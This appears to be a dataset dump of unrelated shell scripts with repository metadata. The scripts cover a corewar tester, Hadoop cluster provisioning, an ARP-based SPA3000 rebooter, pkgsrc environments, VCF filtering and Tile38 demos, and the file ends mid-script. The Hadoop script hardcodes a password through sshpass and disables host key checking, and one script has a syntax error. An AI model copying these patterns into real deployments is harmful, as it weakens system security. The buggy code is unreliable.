if ! [[ "$1" =~ ^[0-9]+$ ]]
then
echo -e "your param 1 \"$1\" is not integers"
ERROR="1"
fi
if ! [[ "$2" =~ ^[0-9]+$ ]]
then
echo -e "your param 2 \"$2\" is not integers"
ERROR="1"
fi
RET=echo -e $3 | grep ".cor" | wc -l | bc`
if [[ ${RET} -le 0 ]]
then
echo -e "The file is not a champions!"
ERROR="1"
fi
if [[ ${ERROR} = "1" ]]
then
exit;
fi
if [ ! -f "corewar" ]
then
make ;
fi
echo "[ START ]\n"
./corewar -d 1 -p $3 > .diff_core && ./subject_ressources/original_corewar -d 1 $3 > .diff_oricore
BASE=`diff .diff_core .diff_oricore | wc -l | bc`
echo "diff is $BASE\n"
while [[ ${COUNTER} -lt $2 ]]
do
./corewar -d $COUNTER -p $3 > .diff_core && ./subject_ressources/original_corewar -d $COUNTER $3 > .diff_oricore
MED=`diff .diff_core .diff_oricore | wc -l | bc`
echo -e "\033[1A\c"
echo -e "count = "${COUNTER}
if [[ ${MED} -ne $BASE ]]
then
TEST=`./subject_ressources/original_corewar -d 500000 $3 | wc -l | bc`
NOW=`./subject_ressources/original_corewar -d $COUNTER $3 | wc -l | bc`
if [[ ${TEST} -ne ${NOW} ]]
then
echo -e "[ ENDING ]\n[ KO ]count = "${COUNTER}
diff .diff_core .diff_oricore
else
echo -e "[ ENDING ]\nzaz vm ending !\n[ OK ]count = "${COUNTER}
fi
exit
fi
(( COUNTER += 1 ))
done
echo "[ ENDING ]\n[ OK ]\ncount = "${COUNTER}
rm -rf .diff_core .diff_oricore
| true
|
1f8782337e38dff7e2376b46a193b6e80358e079
|
Shell
|
dmsherazi/SPA3000-Rebooter
|
/spa-rebooter.sh
|
UTF-8
| 704
| 2.796875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#developed by Dost Muhammad Shah
# github.com/dmsherazi
# Reboots spa3000 by finding them using arp-sacn
# the script serches for cisco lynksis OUI 00:18:f8 ,00:18:39 and 00:14:bf
# This script should work with paswword protected SPA3000 as well.
# Tested with SPA 3000 with the following Software & Hardware versions
# Software Version: 3.1.20(GW) Hardware Version: 3.5.1(1448)
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
PRE="http://"
SUFF="/admin/reboot"
cat /proc/net/arp |egrep '00:18:f8|00:18:39|00:14:bf'| {
while read line
do
IP=`echo "$line" | awk '{ print $1 }'`
wget $PRE$IP$SUFF
done
}
| true
|
76559a8b754662a8b50bd2496ff7401994a92a90
|
Shell
|
esteba61/Hadoop-provision
|
/scripts/setup-nodemaster.sh
|
UTF-8
| 5,558
| 3.125
| 3
|
[] |
no_license
|
#!/usr/bin/bash
function sudoAdmin {
sudo -i
}
function hadoopUser {
useradd hadoop
echo -e "hadoop" | (passwd --stdin hadoop)
}
function installTools {
yum install -y java-1.8.0-openjdk-devel sshpass
cat > /etc/hosts <<EOF
192.168.92.10 nodemasterx
192.168.92.11 nodea
192.168.92.12 nodeb
EOF
}
function sshkey {
sshpass -p 'hadoop' ssh -o StrictHostKeyChecking=no hadoop@nodemasterx 'ssh-keygen -b 4096 -N "" -f /home/hadoop/.ssh/id_rsa'
sshpass -p 'hadoop' ssh-copy-id -o StrictHostKeyChecking=no -i /home/hadoop/.ssh/id_rsa.pub hadoop@nodemasterx
sshpass -p 'hadoop' ssh-copy-id -o StrictHostKeyChecking=no -i /home/hadoop/.ssh/id_rsa.pub hadoop@nodea
sshpass -p 'hadoop' ssh-copy-id -o StrictHostKeyChecking=no -i /home/hadoop/.ssh/id_rsa.pub hadoop@nodeb
}
function downloadHadoop {
su -l hadoop -c "wget http://apache.uniminuto.edu/hadoop/common/hadoop-3.0.2/hadoop-3.0.2.tar.gz > .null;
tar -xzf hadoop-3.0.2.tar.gz > .null;
mv hadoop-3.0.2 hadoop"
}
function setEnvVar {
echo "export HADOOP_HOME=/home/hadoop/hadoop
export HADOOP_MAPRED_HOME=\$HADOOP_HOME
export HADOOP_COMMON_HOME=\$HADOOP_HOME
export HADOOP_HDFS_HOME=\$HADOOP_HOME
export YARN_HOME=\$HADOOP_HOME
export HADOOP_COMMON_LIB_NATIVE_DIR=\$HADOOP_HOME/lib/native
export PATH=$PATH:$HADOOP_HOME/sbin:\$HADOOP_HOME/bin
export LD_LIBRARY_PATH=/home/hadoop/hadoop/lib/native/:\$LD_LIBRARY_PATH
export HADOOP_INSTALL=\$HADOOP_HOME
PATH=/home/hadoop/hadoop/bin:/home/hadoop/hadoop/sbin:\$PATH" >> /home/hadoop/.bashrc
source /home/hadoop/.bashrc
sed -i "s/# export JAVA_HOME=.*/export JAVA_HOME=\/usr\/lib\/jvm\/java-1.8.0-openjdk\/jre/" /home/hadoop/hadoop/etc/hadoop/hadoop-env.sh
}
function setCore-site {
sed -i "s/<configuration>.*/<configuration>\n <property>\n <name>fs.default.name<\/name>\n <value>hdfs:\/\/nodemasterx:9000<\/value>\n <\/property>/" /home/hadoop/hadoop/etc/hadoop/core-site.xml
}
function setHdfs-site {
sed -i "s/<configuration>.*/<configuration>\n <property>\n <name>dfs.namenode.name.dir<\/name>\n <value>\/home\/hadoop\/data\/nameNode<\/value>\n <\/property>\n <property>\n <name>dfs.datanode.data.dir<\/name>\n <value>\/home\/hadoop\/data\/dataNode<\/value>\n <\/property>\n <property>\n <name>dfs.replication<\/name>\n <value>1<\/value>\n <\/property>/" /home/hadoop/hadoop/etc/hadoop/hdfs-site.xml
}
function setMapred-site {
sed -i "s/<configuration>.*/<configuration>\n <property>\n <name>yarn.app.mapreduce.am.env<\/name>\n <value>HADOOP_MAPRED_HOME=\/home\/hadoop\/hadoop<\/value>\n <\/property>\n <property>\n <name>mapreduce.map.env<\/name>\n <value>HADOOP_MAPRED_HOME=\/home\/hadoop\/hadoop<\/value>\n <\/property>\n <property>\n <name>mapreduce.reduce.env<\/name>\n <value>HADOOP_MAPRED_HOME=\/home\/hadoop\/hadoop<\/value>\n <\/property>\n <property>\n <name>mapreduce.framework.name<\/name>\n <value>yarn<\/value>\n <\/property>\n <property>\n <name>yarn.app.mapreduce.am.resource.mb<\/name>\n <value>512<\/value>\n <\/property>\n <property>\n <name>mapreduce.map.memory.mb<\/name>\n <value>256<\/value>\n <\/property>\n <property>\n <name>mapreduce.reduce.memory.mb<\/name>\n <value>256<\/value>\n <\/property>/" /home/hadoop/hadoop/etc/hadoop/mapred-site.xml
}
function setYarn-site {
sed -i "s/<configuration>.*/<configuration>\n <property>\n <name>yarn.acl.enable<\/name>\n <value>0<\/value>\n <\/property>\n <property>\n <name>yarn.resourcemanager.hostname<\/name>\n <value>nodemasterx<\/value>\n <\/property>\n <property>\n <name>yarn.nodemanager.aux-services<\/name>\n <value>mapreduce_shuffle<\/value>\n <\/property>\n <property>\n <name>yarn.nodemanager.resource.memory-mb<\/name>\n <value>1536<\/value>\n <\/property>\n <property>\n <name>yarn.scheduler.maximum-allocation-mb<\/name>\n <value>1536<\/value>\n <\/property>\n <property>\n <name>yarn.scheduler.minimum-allocation-mb<\/name>\n <value>128<\/value>\n <\/property>\n <property>\n <name>yarn.nodemanager.vmem-check-enabled<\/name>\n <value>false<\/value>\n <\/property>/" /home/hadoop/hadoop/etc/hadoop/yarn-site.xml
}
function addWorkers {
echo "nodea
nodeb" >> /home/hadoop/hadoop/etc/hadoop/workers
}
function setupWorkers {
su -l hadoop -c "scp -o StrictHostKeyChecking=no hadoop-*.tar.gz hadoop@nodea:/home/hadoop"
su -l hadoop -c "scp -o StrictHostKeyChecking=no hadoop-*.tar.gz hadoop@nodeb:/home/hadoop"
for node in nodea nodeb; do
sshpass -p 'hadoop' ssh -o StrictHostKeyChecking=no hadoop@$node 'tar -xzf hadoop-3.0.2.tar.gz; mv hadoop-3.0.2 hadoop';
done
su -l hadoop -c "scp -o StrictHostKeyChecking=no -r /home/hadoop/hadoop/etc/hadoop/* hadoop@nodea:/home/hadoop/hadoop/etc/hadoop/"
su -l hadoop -c "scp -o StrictHostKeyChecking=no -r /home/hadoop/hadoop/etc/hadoop/* hadoop@nodeb:/home/hadoop/hadoop/etc/hadoop/"
}
function HDFSandDFS {
su -l hadoop -c "hdfs namenode -format"
su -l hadoop -c "start-dfs.sh"
su -l hadoop -c "start-yarn.sh"
}
echo -e "START SETUP"
echo -e "------SUDOADMIN------"
sudoAdmin
echo -e "------HADOOPUSER------"
hadoopUser
echo -e "------INSTALLTOOLS------"
installTools
echo -e "------SSHKEY------"
sshkey
echo -e "------DOWNLOADHADOOP------"
downloadHadoop
echo -e "------SETENVVAR------"
setEnvVar
echo -e "------SETCORE-SITE------"
setCore-site
echo -e "------SETHDFS-SITE------"
setHdfs-site
echo -e "------SETMAPRED-SITE------"
setMapred-site
echo -e "------SETYARN-SITE------"
setYarn-site
echo -e "------ADDWORKES------"
addWorkers
echo -e "------SETUPWORKES------"
setupWorkers
echo -e "------HDFSANDDFS------"
HDFSandDFS
echo -e "END ALL"
| true
|
85352e794b2e38e5accc787c267ea02e52afee2b
|
Shell
|
TomTheTornado/COMS327
|
/Turnin.sh
|
UTF-8
| 1,324
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Place this in a file named: Turnin.sh
#
# To run type: ./Turnin.sh
#
# If it says permission denied then you will need to change
# the permissions with the command: chmod 777 Turnin.sh
#
set -eu;
read -p "Enter Firstname: " FNAME;
read -p "Enter Lastname: " LNAME;
read -p "Enter Assignment Number: " ASSIGNMENT_NUMBER;
read -p "Directory to Zip: " ASSIGNMENT;
if [ -z $FNAME ]
then
echo "Please enter your firstname!";
exit 1;
fi
if [ -z $LNAME ]
then
echo "Please enter your lastname!"
exit 1
fi
if [ -z $ASSIGNMENT_NUMBER ]
then
echo "Please supply an assignment number!"
exit 1
fi
if [ -z $ASSIGNMENT ]
then
echo "Please enter an assignment directory!"
exit 1
fi
if [ ! -f $ASSIGNMENT/CHANGELOG ]
then
echo "Changelog not found!"
exit 1
fi
if [ ! -f $ASSIGNMENT/README ]
then
echo "ReadMe file not found!"
exit 1
fi
if [ ! -f $ASSIGNMENT/Makefile ]
then
echo "Makefile not found!"
exit 1
fi
#clean directory
cd $ASSIGNMENT
make clean
cd ..
# Copy directory
cp -R $ASSIGNMENT/ ${LNAME}_${FNAME}.assignment-$ASSIGNMENT_NUMBER
#tar the directory
tar cvfz ${LNAME}_${FNAME}.assignment-$ASSIGNMENT_NUMBER.tar.gz ${LNAME}_${FNAME}.assignment-$ASSIGNMENT_NUMBER
# remove the temp directory
rm -r ${LNAME}_${FNAME}.assignment-$ASSIGNMENT_NUMBER
| true
|
35a5f29d11f881796b19680ea4fd6f7bd2f37d59
|
Shell
|
Noremac201/cs310
|
/505/'
|
UTF-8
| 442
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
gen_rand () {
echo gen_rands
rm input.dat
echo 4 >> input.dat
printf "\n" >> input.dat
for i in `seq 4`
do
for n in `seq 4`
do
echo $(( ( RANDOM % 10 ) + 1 )) >> input.dat
printf "\n" >> input.dat
done
done
}
gen_rand
./main < input.dat 1>>/dev/null 2>>data.dat
NBS="$(tail -1 data.dat)"
if [ $NBS -gt 1 ]
then
cat input.dat >> answers.txt
printf "\n" >> answers.txt
fi
| true
|
798510eb86e3bf61bb9e72be8bcd6e5297ac0042
|
Shell
|
drscream/tm-env
|
/bin/scripts/vpkg
|
UTF-8
| 3,853
| 4.21875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
# vpkg by tm@core.io
# Manage virtual pkgsrc environments easily with an simple shell script. To
# have easy commands feel free to create shell aliases.
# Defaults
VPKG_DIR=${HOME}/.vpkg
VPKG_GIT="git@github.com:NetBSD/pkgsrc.git"
# Personal configuration file for overwrite defaults
test -f "${HOME}/.vpkgrc" && . "${HOME}/.vpkgrc"
_help() {
echo "${0} [-l|-c|-d] [NAME]"
echo
echo "OPTIONS:"
echo " -l : List existing pkgsrc virtualenvs"
echo " -c NAME : Create new pkgsrc virtualenv for NAME"
echo " -d NAME : Delete existing pkgsrc virtualenv for NAME"
echo
echo "HELP:"
echo " source ${0}"
echo " on NAME : Switch to pkgsrc virtualenv, by setting PATH and VPKG"
echo " off : Disable current virtualenv, reset PATH and unset VPKG"
}
_die() {
local code="${1}"; shift
local msg="${*}"
echo "ERROR: ${msg}"
exit "${code}"
}
# Create pkgsrc source folder and clone remote data. Switching branch if remote
# branch is available, otherwise use trunk.
_create() {
local name=${1}
local srcdir=${VPKG_DIR}/${name}/src
if ! test -d "${srcdir}"; then
# create working directory
mkdir -p "${srcdir}"
# cloning source code
git clone ${VPKG_GIT} "${srcdir}"
# switching branch / creating branch
cd "${srcdir}" || return 1
if remote_branch=$(git branch -r | grep -i "${name}"); then
git checkout -b "${name}" "${remote_branch}"
else
git checkout -b "${name}"
fi
else
_die 1 "'${name}' already exists!"
fi
}
# Delete the vpkg folder based on the name. It will delete the binary data and
# the source folder.
_remove() {
local name=${1}
if test -d "${VPKG_DIR}/${name}"; then
while true; do
read -rp "Do you really like to delete \`${name}\`? [y|N] " yn
case $yn in
[Yy]* ) rm -r "${VPKG_DIR:?}/${name}"; break ;;
* ) exit ;;
esac
done
else
_die 2 "'${name}' does not exists!"
fi
}
_bootstrap_mk_frag() {
local name=${1}
cat <<-__MKFRAGEOM__
# Developer Defaults
PKG_DEVELOPER= yes
ALLOW_VULNERABLE_PACKAGES= yes
SKIP_LICENSE_CHECK= yes
# Use extra folders for workdir, packages and distfiles
WRKOBJDIR= ${VPKG_DIR}/${name}/workdir
PACKAGES= ${VPKG_DIR}/${name}/packages
DISTDIR= ${VPKG_DIR}/${name}/distfiles
# Modular X11
X11_TYPE= modular
__MKFRAGEOM__
}
_bootstrap() {
local name=${1}
local srcdir=${VPKG_DIR}/${name}/src
if test -d "${srcdir}"; then
cd "${srcdir}" || return 1
./bootstrap/bootstrap \
--abi 64 \
--cwrappers yes \
--make-jobs 8 \
--mk-fragment <(_bootstrap_mk_frag "${name}") \
--prefer-pkgsrc yes \
--prefix "${VPKG_DIR}/${name}/pkg" \
--unprivileged \
--varbase "${VPKG_DIR}/${name}/pkg/var" \
--workdir "${VPKG_DIR}/${name}/workdir"
else
_die 2 "'${name}' does not exists!"
fi
}
#
on() {
local name=${1}
if [ -z "${name}" ]; then
ls "${VPKG_DIR}/"
return 0
fi
if ! test -d "${VPKG_DIR}/${name}/pkg"; then
echo "ERROR: '${name}' does not exists!"
return 1
fi
if type disable &>/dev/null; then
disable
unset -f disable >/dev/null 2>&1
fi
export VPKG=${name}
export __OLDPATH=${PATH}
export PATH=${VPKG_DIR}/${name}/pkg/bin:${VPKG_DIR}/${name}/pkg/sbin:${PATH}
export MANPATH=${VPKG_DIR}/name/pkg/man
eval 'off() {
export PATH=${__OLDPATH}
unset VPKG MANPATH __OLDPATH
}'
}
while getopts ':lc:r:' arg; do
case "${arg}" in
l)
ls "${VPKG_DIR}/"
;;
c)
_create "${OPTARG}"
_bootstrap "${OPTARG}"
;;
r)
_remove "${OPTARG}"
;;
*)
_help
;;
esac
done
(return 0 2>/dev/null) || if (( OPTIND == 1 )); then _help; fi
# Unset all not required functions and global variables because the script
# could be sourced as well to provide a switch function.
unset -f _help
unset -f _die
unset -f _create
unset -f _bootstrap_mk_frag
unset -f _bootstrap
unset -f _remove
unset VPKG_GIT
# vim:sw=2:ts=2
| true
|
3023fcf32397defc3270702e2c31c8b46b95ccbf
|
Shell
|
Chengjian-Tang/owb-mirror
|
/tags/Doduo_1.1/BAL/scripts.old/run_create_all.sh
|
UTF-8
| 2,409
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
#takes input files (and path and module) from list_BI.txt file
#generate BI/BC files
#execute: "cat non_generatedBI_files.txt | sort -u" to see the list of input files that can't generate a BI
#takes only the $1 first entries (if empty, takes 20)
nb=$1
if [ -z "$nb" ];
then
nb=20
fi
HEAD="head -n $nb"
FILTER="ALL"
if ! [ -z "$2" ];
then
if [ "$2" == "BI" ];
then
FILTER="BI"
elif [ "$2" == "BC" ];
then
FILTER="BC"
fi
fi
cat platform_files_list.txt | egrep -v "^#" | egrep -v "^$" | $HEAD | while read p wk fname
do
# echo "[$p] [$wk] [$fname]"
file="$wk"
if echo "$p" | grep -q "/Interfaces/"
then
if [ "$FILTER" != "BC" ]
then
module=`echo "$p" | sed 's/^.*Interfaces\/\(.*\)\/[^\/]*$/\1/'`
path=`echo "$p" | sed 's/Interfaces\/.*$//'`
# echo "**** file=[$file] path=[$path] module=[$module]"
CMD="./bal_create_BI.sh $file $path $module $fname"
echo "+++ execute: $CMD"
$CMD
fi
elif echo "$p" | grep -q "/Concretizations/"
then
if [ "$FILTER" != "BI" ]
then
impl=`echo "$p" | sed 's/^.*\///'`
module=`echo "$p" | sed 's/.*\/Concretizations\/\(.*\)\/[^\/]*$/\1/'`
path=`echo "$p" | sed 's/Concretizations\/.*$//'`
# echo "BC not implemented for now: **** file=[$file] path=[$path] module=[$module] impl=[$impl]"
CMD="./bal_create_BC.sh $file $path $module $impl $fname"
echo "+++ execute: $CMD"
$CMD
fi
else
echo "WARN: $p skiped: doesn't contain valid keyword (Interfaces/Concretizations)"
fi
done
#do next stages by hand
#exit 0
echo
echo "################ get defined class names ################"
echo
#once all BI are created, get class/types names that must be changed:
./getDefinedClassesName.sh
echo
echo "################ update defined class names ################"
echo
#and search/replace all of them with BI starting names
./updateDefinedClassesName.sh 2>&1
echo
echo "################ update defined BI includes ################"
echo
#and search/replace all of them with BI starting names
./updateBIIncludes.sh 2>&1
echo
echo "############## reparent BI to BC ##########################"
echo
./makeBIheritBC.sh 2>&1
echo
echo "############## PostProcess for debugging ##########################"
echo
./postProcessDebug.sh 2>&1
#work directly on ../
#echo
#echo "################ propagate all .h .cpp to right position ################"
#echo
#and finally propagate all
#./propageAll.sh
| true
|
d7d0054db45f492ef196685c67a21e2d164504e8
|
Shell
|
maiziex/10X_project
|
/src/extract_gold_locus.sh
|
UTF-8
| 4,080
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
############################# cut chromosome for three files ################################
for i in {1..22}
do
chr_num=$i
output_prefix="NA12878_gold_pos_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/NA12878_GIAB_highconf_IllFB-IllGATKHC-CG-Ion-Solid_ALLCHROM_v3.2.2_highconf.vcf | awk '{if($1=="'$chr_num'") print $2}' > $output_name
done
for i in {1..22}
do
chr="chr"
chr_num=$chr$i
output_prefix="phase_convert_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/phased_convert.vcf | awk '{if($1=="'$chr_num'") print $0}' > $output_name
done
for i in {1..22}
do
chr="chr"
chr_num=$chr$i
output_prefix="10x_phased_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/phasedvcf/merge_NA12878_forwhatshap.vcf | awk '{if($1=="'$chr_num'") print $0}' > $output_name
done
############################# only select gold loci ################################
for i in {1..22}
do
input_prefix="phase_convert_chr"
input_suffix=".vcf"
input_name=$input_prefix$i$input_suffix
input2_prefix="NA12878_gold_pos_chr"
input2_suffix=".vcf"
input2_name=$input2_prefix$i$input2_suffix
output_prefix="phase_convert_gold_pos_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/usegold/$input_name |sort -k2,2| join -t$'\t' -1 2 -2 1 - <(cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/usegold/$input2_name | sort -k1,1) | awk -F $'\t' ' { t = $1; $1 = $2; $2 = t; print; } ' OFS=$'\t' | sort -nk2 > $output_name
done
for i in {1..22}
do
input_prefix="10x_phased_chr"
input_suffix=".vcf"
input_name=$input_prefix$i$input_suffix
input2_prefix="NA12878_gold_pos_chr"
input2_suffix=".vcf"
input2_name=$input2_prefix$i$input2_suffix
output_prefix="10x_phased_gold_pos_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/usegold/$input_name |sort -k2,2| join -t$'\t' -1 2 -2 1 - <(cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/usegold/$input2_name | sort -k1,1) | awk -F $'\t' ' { t = $1; $1 = $2; $2 = t; print; } ' OFS=$'\t' | sort -nk2 > $output_name
done
cat phase_convert_gold_pos_chr1.vcf phase_convert_gold_pos_chr2.vcf phase_convert_gold_pos_chr3.vcf phase_convert_gold_pos_chr4.vcf phase_convert_gold_pos_chr5.vcf phase_convert_gold_pos_chr6.vcf phase_convert_gold_pos_chr7.vcf phase_convert_gold_pos_chr8.vcf phase_convert_gold_pos_chr9.vcf phase_convert_gold_pos_chr10.vcf phase_convert_gold_pos_chr11.vcf phase_convert_gold_pos_chr12.vcf phase_convert_gold_pos_chr13.vcf phase_convert_gold_pos_chr14.vcf phase_convert_gold_pos_chr15.vcf phase_convert_gold_pos_chr16.vcf phase_convert_gold_pos_chr17.vcf phase_convert_gold_pos_chr18.vcf phase_convert_gold_pos_chr19.vcf phase_convert_gold_pos_chr20.vcf phase_convert_gold_pos_chr21.vcf phase_convert_gold_pos_chr22.vcf > phase_convert_gold_pos_all.vcf
cat 10x_phased_gold_pos_chr1.vcf 10x_phased_gold_pos_chr2.vcf 10x_phased_gold_pos_chr3.vcf 10x_phased_gold_pos_chr4.vcf 10x_phased_gold_pos_chr5.vcf 10x_phased_gold_pos_chr6.vcf 10x_phased_gold_pos_chr7.vcf 10x_phased_gold_pos_chr8.vcf 10x_phased_gold_pos_chr9.vcf 10x_phased_gold_pos_chr10.vcf 10x_phased_gold_pos_chr11.vcf 10x_phased_gold_pos_chr12.vcf 10x_phased_gold_pos_chr13.vcf 10x_phased_gold_pos_chr14.vcf 10x_phased_gold_pos_chr15.vcf 10x_phased_gold_pos_chr16.vcf 10x_phased_gold_pos_chr17.vcf 10x_phased_gold_pos_chr18.vcf 10x_phased_gold_pos_chr19.vcf 10x_phased_gold_pos_chr20.vcf 10x_phased_gold_pos_chr21.vcf 10x_phased_gold_pos_chr22.vcf > 10x_phased_gold_pos_all.vcf
cat header1.vcf 10x_phased_gold_pos_all.vcf > 10x_phased_gold_pos.vcf
cat header2.vcf phase_convert_gold_pos_all.vcf > phase_convert_gold_pos.vcf
| true
|
3fe5f8a2bb54bd64bf757249939244b796cbecfa
|
Shell
|
doubleq23/gitrepolazu
|
/shellscripts/list-access-keys.sh
|
UTF-8
| 140
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/sh
for i in $(cat PRODENG-2753-users)
do
echo "Checking user $i"
aws iam list-access-keys --user-name $i --profile=awsdevus
done
| true
|
bf086368a092485b7381f31de0ed5bcc588f7a47
|
Shell
|
guluguluchui/Custom_Debian_Set
|
/filesystem_set.sh
|
UTF-8
| 1,792
| 2.796875
| 3
|
[] |
no_license
|
#! /usr/bin/sh
#kernel_version
kernel_version=3.8.13-bone68
filesystem_path=./tmp
kernel_deploy=~/workspace/AM335x/eewiki/deploy
#uEnv.txt
sudo sh -c "echo 'uname_r=${kernel_version}' > ${filesystem_path}/boot/uEnv.txt"
sudo sh -c "echo 'optargs=quiet capemgr.enable_partno=BB-UART1,BB-UART2,BB-UART4,BB-SPIDEV1,BB-I2C1,BB-ADC init=/lib/systemd/systemd' >> ${filesystem_path}/boot/uEnv.txt"
#kernel, dtbs, modules, firmware
sudo cp -v ${kernel_deploy}/${kernel_version}.zImage ${filesystem_path}/boot/vmlinuz-${kernel_version}
sudo mkdir -p ${filesystem_path}/boot/dtbs/${kernel_version}/
sudo tar xfv ${kernel_deploy}/${kernel_version}-dtbs.tar.gz -C ${filesystem_path}/boot/dtbs/${kernel_version}/
sudo tar xfv ${kernel_deploy}/${kernel_version}-modules.tar.gz -C ${filesystem_path}/
sudo tar xfv ${kernel_deploy}/${kernel_version}-firmware.tar.gz -C ${filesystem_path}/lib/firmware/
#fstab
sudo sh -c "echo '/dev/mmcblk0p1 / auto errors=remount-ro 0 1' >> ${filesystem_path}/etc/fstab"
#inittab
sudo sh -c "echo 'T0:23:respawn:/sbin/getty -L ttyO0 115200 vt102' >> ${filesystem_path}/etc/inittab"
#eMMC-flasher
sudo cp -v ~/workspace/AM335x/eewiki/bbb-eMMC-flasher-eewiki-ext4.sh ${filesystem_path}/root/
#etc/network/interfaces
sudo mv ${filesystem_path}/etc/network/interfaces ${filesystem_path}/etc/network/backup_interfaces
sudo sh -c "echo '# interfaces(5) file used by ifup(8) and ifdown(8)' > ${filesystem_path}/etc/network/interfaces"
sudo sh -c "echo 'auto lo' >> ${filesystem_path}/etc/network/interfaces"
sudo sh -c "echo 'allow-hotplug eth0' >> ${filesystem_path}/etc/network/interfaces"
sudo sh -c "echo 'iface eth0 inet dhcp' >> ${filesystem_path}/etc/network/interfaces"
sudo sh -c "echo 'iface lo inet loopback' >> ${filesystem_path}/etc/network/interfaces"
| true
|
200b4762eb7b659328fb2f88fe9b897376e2787d
|
Shell
|
hlmuludiang/dotfiles
|
/zsh/plugins/macos.zsh
|
UTF-8
| 667
| 2.734375
| 3
|
[] |
no_license
|
if [[ $OSTYPE == darwin* ]]; then
export LC_ALL=en_US.UTF-8
export LANG=en_US.UTF-8
export HOMEBREW_NO_ANALYTICS=1
manpath=(/usr/local/share/man /usr/share/man "$manpath[@]")
for pkg in coreutils diffutils findutils gawk gnu-sed gnu-tar grep; do
path=(/usr/local/opt/"${pkg}"/libexec/gnubin "$path[@]")
manpath=(/usr/local/opt/"${pkg}"/libexec/gnuman "$manpath[@]")
done
path=(
"$DOTFILES/scripts/macos"
/usr/local/opt/curl/bin
/usr/local/opt/sqlite/bin
/usr/local/sbin
"$path[@]"
)
man() {
/usr/bin/man "$@" 2> /dev/null
}
full-update add brew-update
fi
| true
|
dddfd1f25030f3d78c7e042feddbb3d49a2d6f9f
|
Shell
|
Praqma/questionnaire-models
|
/scripts/create_service.sh
|
UTF-8
| 1,648
| 3.9375
| 4
|
[
"MIT"
] |
permissive
|
# How to use this script:
# source /scripts/create_service.sh <service-name> <image-tag> <environment> <db-uri>
# source /scripts/create_service.sh aws-qe-deploy praqma/questionaire-engine:0.1.0 test "mongodb://praqmadb:..."
# ATTENTION: the grep command requires the -P or -G flag for regex to work on this CI server - might throw error on different linux versions
SERVICE_NAME=$1
IMAGE_TAG=$2
ENV=$3
create_service() {
echo "Creating service. This will take a while..."
fargate service create $SERVICE_NAME --image $IMAGE_TAG --env DB_PASSWORD_PROD=$DB_PASSWORD_PROD --env PORT=80
}
check_service_status() {
fargate service info $SERVICE_NAME | grep -oP 'Running: \d' | grep -oP '\d'
}
get_ip() {
fargate service info $SERVICE_NAME | grep -oG '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
}
SECONDS=0
wait_for_ip() {
if [ "$SERVICE_NAME" == "" ]; then
echo "SERVICE_NAME not found. Did you source your env vars?"
fi
while [[ $RUNNING -ne "1" ]]
do
RUNNING=$(check_service_status)
if [ "$RUNNING" == "1" ]; then
echo "Server is running on IP $(get_ip)"
break
elif [ "$RUNNING" == "0" ]; then
echo "[i] Server is starting up..."
else
echo "[!] Could not read service status."
fi
sleep 10s
# time out after 5 minutes (300 seconds)
if [ $SECONDS -gt "300" ]
then
echo "[!] Timed out - server could not be started."
exit 1
break
fi
done
}
# Deploy image to AWS Fargate
create_service
# Ping server until it boots up
wait_for_ip
# Return IP of the running server
export IP=$(get_ip)
| true
|
714181c5e522ba2edc8490468e9bf77957700b6b
|
Shell
|
robcn/personalrobots-pkg
|
/stacks/trex/trex_pr2/test/createTmaps.sh
|
UTF-8
| 368
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Create topomap symlinks."
FILES="willow.tmap.outlet_overrides.xml willow.tmap.door_overrides.xml willow.tmap"
for file in $FILES ; do
rm -f `rospack find trex_pr2`/test/$file
echo "ln -s `rospack find willow_maps`/$file `rospack find trex_pr2`/test/$file"
ln -s `rospack find willow_maps`/$file `rospack find trex_pr2`/test/$file
done
| true
|
1dcec58a6a8f71de5dc8f6198adc5b6ab128fdac
|
Shell
|
tesujiro/qiita_tile38
|
/commands.sh
|
UTF-8
| 2,042
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
PROMPT="127.0.0.1:9851> "
exec_tile38_cli(){
echo -n "$PROMPT"
echo "$@"
echo "$@" | tile38-cli
}
export -f exec_tile38_cli
commands-1(){
cat <<EOF | awk 'gsub(/#.*/,"")>=0'
DROP location
DROP lunch
#
GET location me POINT 35.6581 139.6975
#
SET lunch ramen:A POINT 35.6586 139.6982
SET lunch gyudon:B POINT 35.6570 139.6967
SET lunch ramen:C POINT 35.6576 139.6948
SCAN lunch MATCH ramen* IDS
NEARBY lunch POINT 35.6581 139.6975 100
EOF
}
commands-2(){
cat <<EOF | awk 'gsub(/#.*/,"")>=0'
DROP location
DROP example
#
SET location me POINT 35.6581 139.6975
GET location me
SET example bounds:X BOUNDS 35.6578 139.6971 35.6581 139.6968
SET example bounds:Y BOUNDS 35.6572 139.6984 35.6575 139.6978
SET example bounds:Z BOUNDS 35.6590 139.6967 35.6594 139.6959
WITHIN example IDS CIRCLE 35.6581 139.6975 120
INTERSECTS example IDS CIRCLE 35.6581 139.6975 120
EOF
}
#commands-2 | tile38-cli
commands-2 | while read line
do
exec_tile38_cli "$line"
done
geoJson(){
local TYPE=$1
local COORDINATES=$2
cat <<EOF | awk 'gsub(/#.*/,"")>=0' | tr -d '\t' | tr -d '\n'
{
"type":"$TYPE",
"coordinates":$COORDINATES
}
EOF
}
commands-3(){
local KEY=example
cat <<EOF | awk 'gsub(/#.*/,"")>=0'
DROP location
